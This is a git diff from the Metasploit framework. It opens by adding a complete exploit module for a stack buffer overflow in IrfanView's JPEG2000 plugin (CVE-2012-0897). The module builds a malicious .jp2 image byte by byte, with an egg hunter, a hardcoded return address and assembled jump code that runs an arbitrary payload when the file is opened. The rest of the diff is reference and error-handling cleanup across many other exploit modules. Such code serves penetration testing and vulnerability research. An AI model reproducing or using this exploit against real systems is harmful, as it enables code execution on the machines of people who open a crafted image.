+ This module exploits a stack-based buffer overflow vulnerability in
+ version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
+ tested on a specific version of irfanview (v4.3.2), although other versions may
+ work also. The vulnerability is triggered via parsing an invalid qcd chunk
+ structure and specifying a malformed qcd size and data.
+
+ Payload delivery and vulnerability trigger can be executed in multiple ways.
+ The user can double click the file, use the file dialog, open via the icon
+ and drag/drop the file into Irfanview\'s window. An egg hunter is used for
+ stability.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Parvez Anwar ', # vulnerability discovery
+ 'mr_me ', # msf-fu
+ 'juan vazquez' # more improvements
+ ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2012-0897' ],
+ [ 'OSVDB', '78333'],
+ [ 'BID', '51426' ],
+ [ 'URL', 'http://www.greyhathacker.net/?p=525' ],
+ ],
+ 'Platform' => [ 'win' ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 4000,
+ 'DisableNops' => true,
+ },
+ 'Targets' =>
+ [
+ # push esp; retn [i_view32.exe]
+ # http://www.oldapps.com/irfanview.php?old_irfanview=7097
+ # http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe
+ [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
+ ],
+ 'DisclosureDate' => 'Jan 16 2012',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),
+ ], self.class)
+ end
+
+ # encode our string like unicode except we are not using nulls
+ def encode_bytes(raw_bytes)
+ encoded_bytes = ""
+ 0.step(raw_bytes.length-1, 2) { |i|
+ encoded_bytes << raw_bytes[i+1]
+ encoded_bytes << raw_bytes[i]
+ }
+ return encoded_bytes
+ end
+
+ def exploit
+ jp2 = ""
+ jp2 << "\x00\x00\x00\x0c" #
+ jp2 << "\x6a\x50\x20\x20" # [jP ] <0x6a502020> magic 0xd0a870a,len 12
+ jp2 << "\x0d\x0a\x87\x0a" #
+ jp2 << "\x00\x00\x00\x14" #
+ jp2 << "\x66\x74\x79\x70" #
+ jp2 << "\x6a\x70\x32\x20" #
+ jp2 << "\x00\x00\x00\x00" # MinorVersion = 0 = [\0\0\0\0]
+ jp2 << "\x6a\x70\x32\x20" # Compat = 0x6a703220 = [jp2 ]
+ jp2 << "\x00\x00\x00\x38" #
+ jp2 << "\x75\x75\x69\x64" # [uuid] <0x75756964> len 56 data offset 8
+ jp2 << "\x61\x70\x00\xde\xec\x87" # 56 bytes with start and end tags
+ jp2 << "\xd5\x11\xb2\xed\x00\x50" #
+ jp2 << "\x04\x71\xfd\xdc\xd2\x00" #
+ jp2 << "\x00\x00\x40\x01\x00\x00" #
+ jp2 << "\x00\x00\x00\x00\x60\x09" #
+ jp2 << "\x00\x00\x00\x00\x00\x00" #
+ jp2 << "\x00\x00\x00\x00\x00\x00" #
+ jp2 << "\x00\x00\x30\x00\x00\x00" #
+ jp2 << "\x00\x00\x00\x2d" #
+ jp2 << "\x6a\x70\x32\x68" # [jp2h] <0x6a703268> len 45 data offset 8
+ jp2 << "\x00\x00\x00\x16" #
+ jp2 << "\x69\x68\x64\x72" # [ihdr] <0x69686472> len 22 data offset 8
+ jp2 << "\x00\x00\x00\x0a" # ImageHeight = 10
+ jp2 << "\x00\x00\x00\x0a" # ImageWidth = 10
+ jp2 << "\x00\x03" # NumberOfComponents = 3
+ jp2 << "\x07" # BitsPerComponent = 7
+ jp2 << "\x07" # Compression = 7
+ jp2 << "\x01" # Colorspace = 0x1 = unknown
+ jp2 << "\x00\x00\x00\x00\x0f" #
+ jp2 << "\x63\x6f\x6c\x72" # [colr] <0x636f6c72> len 15 data offset 8
+ jp2 << "\x01" # Method = 1
+ jp2 << "\x00" # Precedence = 0
+ jp2 << "\x00" # ColorSpaceAproximation = 0
+ jp2 << "\x00\x00\x00" # EnumeratedColorSpace = 16 = sRGB
+ jp2 << "\x10\x00\x00\x00\x00" #
+ jp2 << "\x6a\x70\x32\x63" # [jp2c] <0x6a703263> length 0 data offset 8
+ jp2 << "\xff\x4f" # <0xff4f=JP2C_SOC> Start of codestream
+ jp2 << "\xff\x51" # <0xff51=JP2C_SIZ> length 47
+ jp2 << "\x00\x2f" # 47 bytes
+ jp2 << "\x00\x00" # Capabilities = 0
+ jp2 << "\x00\x00\x00\x0a" # GridWidth = 10
+ jp2 << "\x00\x00\x00\x0a" # GridHeight = 10
+ jp2 << "\x00\x00\x00\x00" # XImageOffset = 0
+ jp2 << "\x00\x00\x00\x00" # YImageOffset = 0
+ jp2 << "\x00\x00\x00\x0a" # TileWidth = 10
+ jp2 << "\x00\x00\x00\x0a" # TileHeight = 10
+ jp2 << "\x00\x00\x00\x00" # Xtileoffset = 0
+ jp2 << "\x00\x00\x00\x00" # Ytileoffset = 0
+ jp2 << "\x00\x03" # NumberOfComponents = 3
+ jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
+ jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
+ jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
+ jp2 << "\xff\x52" # <0xff52=JP2C_COD> length 12
+ jp2 << "\x00\x0c" # 12 bytes
+ jp2 << "\x00" # codingStyle=0=entropy coder w/o partition
+ jp2 << "\x00" # ProgressionOrder = 0
+ jp2 << "\x00\x05" # NumberOfLayers = 0x5
+ jp2 << "\x01" # MultiComponentTransform=0x1=5/3 reversible
+ jp2 << "\x05" # DecompLevels = 5
+ jp2 << "\x04" # CodeBlockWidthExponent=0x4+2 # cbw ->64
+ jp2 << "\x04" # CodeBlockHeightExponent=0x4+2 # cbh ->64
+ jp2 << "\x00" # CodeBLockStyle = 0
+ jp2 << "\x00" # QMIFBankId = 0
+
+ eggoptions =
+ {
+ :checksum => false,
+ :eggtag => 'pwnd'
+ }
+
+ hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
+ qcd_data = ""
+ qcd_data << make_nops(10)
+ qcd_data << encode_bytes(hunter)
+ qcd_data << rand_text_alpha(146)
+
+ jmp_hunter = %q{
+ jmp $-0xad
+ inc ecx
+ }
+
+ # jump to our egghunter
+ jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string
+
+ qcd_data << encode_bytes(jmp_hunter)
+ qcd_data << rand_text_alpha(196-qcd_data.length)
+ qcd_data << encode_bytes([target.ret].pack("V"))
+
+ # align ecx and jmp
+ pivot = %q{
+ inc ch
+ jmp ecx
+ }
+
+ pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string
+
+ qcd_data << encode_bytes(pivot)
+ qcd_data << egg
+
+ jp2 << "\xff\x5c" # start
+ jp2 << "\x00\xf5" # arbitrary size to trigger overflow
+ jp2 << "\x22" # guard
+ jp2 << qcd_data # malicious code
+ jp2 << "\xff\x90" # <0xff90=JP2C_SOT>len 10
+ jp2 << "\x00\x0a" # 10 bytes
+ jp2 << "\x00\x00\x00\x00\x00\x68\x00\x01"
+ jp2 << "\xff\x93" # <0xff93=JP2C_SOD> Start of data
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80"
+ jp2 << "\xff\xd9"
+
+ # Create the file
+ print_status("Creating '#{datastore['FILENAME']}' file...")
+
+ file_create(jp2)
+ end
+
+end
diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
index 950c2fa5f0..18c82de3c2 100644
--- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
+++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- [ 'OSVDB', '72455'],
+ [ 'OSVDB', '72063'],
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
index ba33a76194..b777d37f98 100644
--- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
+++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2010-4742' ],
[ 'OSVDB', '68986'],
[ 'URL', 'http://www.moxa.com' ],
],
diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
index bf9a5ece0f..5645104a92 100644
--- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
+++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
@@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote
out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
- raise RuntimeError, 'Unable to create output file'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create output file')
end
stm = stg.create_stream("Workbook")
if (not stm)
- raise RuntimeError, 'Unable to create workbook stream'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create workbook stream')
end
stm << content
stm.close
diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
index 88c146c439..c53609244e 100644
--- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
+++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
@@ -227,13 +227,13 @@ class Metasploit3 < Msf::Exploit::Remote
out = datastore['FILENAME']
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
- raise RuntimeError, 'Unable to create output file'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create output file')
end
# PowerPoint Document stream
stm = stg.create_stream("PowerPoint Document")
if (not stm)
- raise RuntimeError, 'Unable to create "PowerPoint Document" stream'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create "PowerPoint Document" stream')
end
stm << content
stm.close
@@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
stm = stg.create_stream("Current User")
if (not stm)
- raise RuntimeError, 'Unable to create "Current User" stream'
+ fail_with(Exploit::Failure::Unknown, 'Unable to create "Current User" stream')
end
stm << current_user_stream
stm.close
diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
index c25be95639..b60b700e38 100644
--- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
+++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
@@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote
out = ::File.expand_path(::File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
- raise RuntimeError, 'Unable to create output file'
+ fail_with(Exploit::Failure::BadConfig, 'Unable to create output file')
end
stm = stg.create_stream("\x05SummaryInformation")
if (not stm)
- raise RuntimeError, 'Unable to create SummaryInformation stream'
+ fail_with(Exploit::Failure::BadConfig, 'Unable to create SummaryInformation stream')
end
stm << generate_summaryinfo()
stm.close
@@ -295,7 +295,7 @@ class Metasploit3 < Msf::Exploit::Remote
rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
rvas['BaseAddress'] + rvas[e]
elsif e == :unused
@@ -312,7 +312,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def rva2addr(rvas, key)
- raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end
diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb
index c175e4ca9e..326850608e 100644
--- a/modules/exploits/windows/fileformat/scadaphone_zip.rb
+++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- #[ 'CVE', '' ],
+ [ 'CVE', '2011-4535' ],
[ 'OSVDB', '75375' ],
[ 'URL', 'http://www.scadatec.com/' ],
[ 'EDB', 17817 ],
diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
index 8b88c89bea..2869e3eb69 100644
--- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
+++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb
@@ -228,7 +228,7 @@ EOS
EOS
copy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string
if (copy_stage.length % 4) > 0
- raise RuntimeError, "The copy stage is invalid"
+ fail_with(Exploit::Failure::Unknown, "The copy stage is invalid")
end
rop_stack = [
@@ -296,7 +296,7 @@ EOS
rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::Unknown, "Unable to locate key: \"#{e}\"") if not rvas[e]
rvas['BaseAddress'] + rvas[e]
elsif e == :unused
@@ -313,7 +313,7 @@ EOS
end
def rva2addr(rvas, key)
- raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
+ fail_with(Exploit::Failure::Unknown, "Unable to locate key: \"#{key}\"") if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end
diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
index 80c4d760e3..5adf16ec5b 100644
--- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb
+++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb
@@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '55509' ],
[ 'CVE', '2009-2484' ],
[ 'URL', 'http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f' ],
- [ 'URL', 'http://milw0rm.com/exploits/9209' ],
[ 'EDB', 9029 ]
],
'Payload' =>
diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
index e252509cde..ea0f2e8994 100644
--- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
+++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'CVE', '2008-2789' ],
[ 'BID', '46290' ],
[ 'EDB', '16141' ]
],
diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
index 2801f3096f..fdec319167 100644
--- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
+++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2004-0964' ],
[ 'OSVDB', '10416' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7888' ],
+ [ 'EDB', '7888' ],
[ 'BID', '11248' ],
],
'Payload' =>
diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb
index 308722b3e9..1eba0a137c 100644
--- a/modules/exploits/windows/ftp/ability_server_stor.rb
+++ b/modules/exploits/windows/ftp/ability_server_stor.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
- [ 'URL', '2004-1626' ],
+ [ 'CVE', '2004-1626' ],
[ 'OSVDB', '11030'],
[ 'EDB', 588],
],
diff --git a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
index 48fd7ece81..563d96b461 100644
--- a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
+++ b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
@@ -26,8 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
- #[ 'OSVDB', '---' ],
- #[ 'CVE', '---' ],
+ [ 'OSVDB', '77105' ],
[ 'EDB', 18102 ]
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb
index 7f2f4066bc..867eac60b7 100644
--- a/modules/exploits/windows/ftp/dreamftp_format.rb
+++ b/modules/exploits/windows/ftp/dreamftp_format.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2004-2074'],
[ 'OSVDB', '4986'],
[ 'BID', '9800'],
- [ 'URL', 'http://www.milw0rm.com/exploits/823'],
+ [ 'EDB', '823']
],
'Platform' => ['win'],
'Privileged' => false,
diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb
index bdedeb6c59..40e6594c2f 100644
--- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb
+++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2003-0558' ],
[ 'OSVDB', '4587' ],
[ 'BID', '7860' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/54' ],
+ [ 'EDB', '54' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb
index e9bf8eb58f..8ed65c5592 100644
--- a/modules/exploits/windows/ftp/sami_ftpd_user.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb
@@ -43,11 +43,11 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '16370'],
[ 'BID', '22045'],
[ 'BID', '17835'],
- [ 'URL', 'http://www.milw0rm.com/exploits/1448'],
- [ 'URL', 'http://www.milw0rm.com/exploits/1452'],
- [ 'URL', 'http://www.milw0rm.com/exploits/1462'],
- [ 'URL', 'http://www.milw0rm.com/exploits/3127'],
- [ 'URL', 'http://www.milw0rm.com/exploits/3140'],
+ [ 'EDB', '1448'],
+ [ 'EDB', '1452'],
+ [ 'EDB', '1462'],
+ [ 'EDB', '3127'],
+ [ 'EDB', '3140']
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb
index 47edefee19..a832eebf63 100644
--- a/modules/exploits/windows/games/mohaa_getinfo.rb
+++ b/modules/exploits/windows/games/mohaa_getinfo.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2004-0735'],
[ 'OSVDB', '8061' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/357'],
+ [ 'EDB', '357'],
[ 'BID', '10743'],
],
'Privileged' => false,
diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb
index 2d51278929..0fbf35406f 100644
--- a/modules/exploits/windows/games/racer_503beta5.rb
+++ b/modules/exploits/windows/games/racer_503beta5.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2007-4370' ],
[ 'OSVDB', '39601' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/4283' ],
+ [ 'EDB', '4283' ],
[ 'BID', '25297' ],
],
'Payload' =>
diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb
index 5b627060a5..e2eb512213 100644
--- a/modules/exploits/windows/http/altn_securitygateway.rb
+++ b/modules/exploits/windows/http/altn_securitygateway.rb
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Attempting to automatically select a target...")
mytarget = auto_target
if mytarget.nil?
- raise RuntimeError, "Unable to automatically select a target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically select a target")
end
print_status("Automatically selected target \"#{mytarget.name}\"")
end
diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
index 231947d0e9..ff2b23ca7f 100644
--- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
+++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
@@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '27588' ],
[ 'BID', '19204' ],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/3680' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/3996' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/2237' ],
+ [ 'EDB', '3680' ],
+ [ 'EDB', '3996' ],
+ [ 'EDB', '2237' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb
index 7a53b02514..1ebcde2f59 100644
--- a/modules/exploits/windows/http/belkin_bulldog.rb
+++ b/modules/exploits/windows/http/belkin_bulldog.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'OSVDB', '54395' ],
[ 'BID', '34033' ],
+ [ 'EDB', '8173' ]
],
'Privileged' => true,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
index 8e812e5025..9648071c54 100644
--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -36,17 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- [ 'EDB', 17574 ],
+ [ 'CVE', '2011-3011' ],
+ [ 'OSVDB', '74162' ],
+ [ 'EDB', 17574 ]
],
'DefaultOptions' =>
{
- 'EXITFUNC' => 'process',
+ 'EXITFUNC' => 'process'
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
- 'BadChars' => "\x00\x0d\x0a",
+ 'BadChars' => "\x00\x0d\x0a"
},
'Platform' => 'win',
'Targets' =>
diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb
index 72be6f57b1..7bac383c1c 100644
--- a/modules/exploits/windows/http/ca_igateway_debug.rb
+++ b/modules/exploits/windows/http/ca_igateway_debug.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2005-3190' ],
[ 'OSVDB', '19920' ],
[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/1243' ],
+ [ 'EDB', '1243' ],
[ 'BID', '15025' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
index 48ec7f969f..2f417cfedd 100644
--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
if ( res and res.body =~ /SUCCESS/ )
#print_good("Executing command...")
else
- raise RuntimeError, 'Something went wrong.'
+ fail_with(Exploit::Failure::Unknown, 'Something went wrong.')
end
end
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Target not supported.'
+ fail_with(Exploit::Failure::Unknown, 'Target not supported.')
end
handler
diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb
index a1be8431aa..e1695a4a3f 100644
--- a/modules/exploits/windows/http/easyftp_list.rb
+++ b/modules/exploits/windows/http/easyftp_list.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
if (payload.encoded.length > payload_space)
- raise RuntimeError, "Insufficient space for payload, try using a staged, ORD and/or shell payload."
+ fail_with(Exploit::Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")
end
# Fix up ESP, jmp to the beginning of the buffer
diff --git a/modules/exploits/windows/http/ezserver_http.rb b/modules/exploits/windows/http/ezserver_http.rb
index 6b0348bf3f..3e15f0d394 100644
--- a/modules/exploits/windows/http/ezserver_http.rb
+++ b/modules/exploits/windows/http/ezserver_http.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'OSVDB', '83065' ],
[ 'BID', '54056' ],
[ 'EDB', '19266' ],
[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]
diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb
index e4e3501030..4fc428c207 100644
--- a/modules/exploits/windows/http/hp_nnm_ovas.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovas.rb
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
when /NNM Release B.07.51/
targ = targets[2]
else
- raise RuntimeError, "Unable to determine a target automatically..."
+ fail_with(Exploit::Failure::NoTarget, "Unable to determine a target automatically...")
# if snmp is running you could set the target based on community strings
end
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not resp.nil?
- raise RuntimeError, "The server responded, that wasn't supposed to happen!"
+ fail_with(Exploit::Failure::Unknown, "The server responded, that wasn't supposed to happen!")
end
print_status("Malformed http request sent.")
diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb
index 4bebd2168f..642cb0c93b 100644
--- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb
@@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not res
- raise RuntimeError, "Eek! We didn't get a response.. Exploiting this vuln should return one!"
+ fail_with(Exploit::Failure::Unknown, "Eek! We didn't get a response.. Exploiting this vuln should return one!")
end
print_status(res.body) if datastore["NNM_DEBUG"]
@@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res.body =~ /graphing applet is being/
print_status("We got the body we were looking for, the session should be coming any second.")
else
- raise RuntimeError, "Eek, exploit likely failed. The body didn't contain what we expected."
+ fail_with(Exploit::Failure::Unknown, "Eek, exploit likely failed. The body didn't contain what we expected.")
end
handler
diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb
index d5bfd57573..de3912f278 100644
--- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not res
- raise RuntimeError, "Eek! We didn't get a response.. Exploiting this vuln should return one!"
+ fail_with(Exploit::Failure::Unknown, "Eek! We didn't get a response.. Exploiting this vuln should return one!")
end
print_status(res.body) if datastore["NNM_DEBUG"]
@@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res.body =~ /graphing applet is being/
print_status("We got the body we were looking for, the session should be coming any second.")
else
- raise RuntimeError, "Eek, exploit likely failed. The body didn't contain what we expected."
+ fail_with(Exploit::Failure::Unknown, "Eek, exploit likely failed. The body didn't contain what we expected.")
end
handler
diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb
index 701c732a23..82e3ef17eb 100644
--- a/modules/exploits/windows/http/httpdx_tolog_format.rb
+++ b/modules/exploits/windows/http/httpdx_tolog_format.rb
@@ -167,7 +167,7 @@ For now, that will have to be done manually.
version = get_version
if not version
- raise RuntimeError, "The server doesn't appear to be running a vulnerable version of HTTPDX"
